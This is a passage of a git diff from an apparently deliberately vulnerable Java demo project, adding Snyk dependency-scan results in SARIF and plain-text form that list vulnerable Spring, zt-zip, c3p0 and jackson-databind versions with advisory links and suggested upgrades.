"org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-expression package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-expression@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-beans package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-beans@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.2.22.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.2.22.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "level": "note", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-context package with a low severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-context@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.zeroturnaround:zt-zip package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.zeroturnaround:zt-zip@1.12" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.zeroturnaround:zt-zip@1.13" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.zeroturnaround:zt-zip@1.13" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/todolist-goof/todolist-web-struts/test.text b/todolist-goof/todolist-web-struts/test.text new file mode 100644 index 0000000000..3e69986d8c --- /dev/null +++ b/todolist-goof/todolist-web-struts/test.text @@ -0,0 +1,799 @@ + +Testing snyk-filter-1.3.2... +✗ High severity vulnerability found on c3p0:c3p0@0.9.1.2 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-C3P0-461018 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > c3p0:c3p0@0.9.1.2 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: 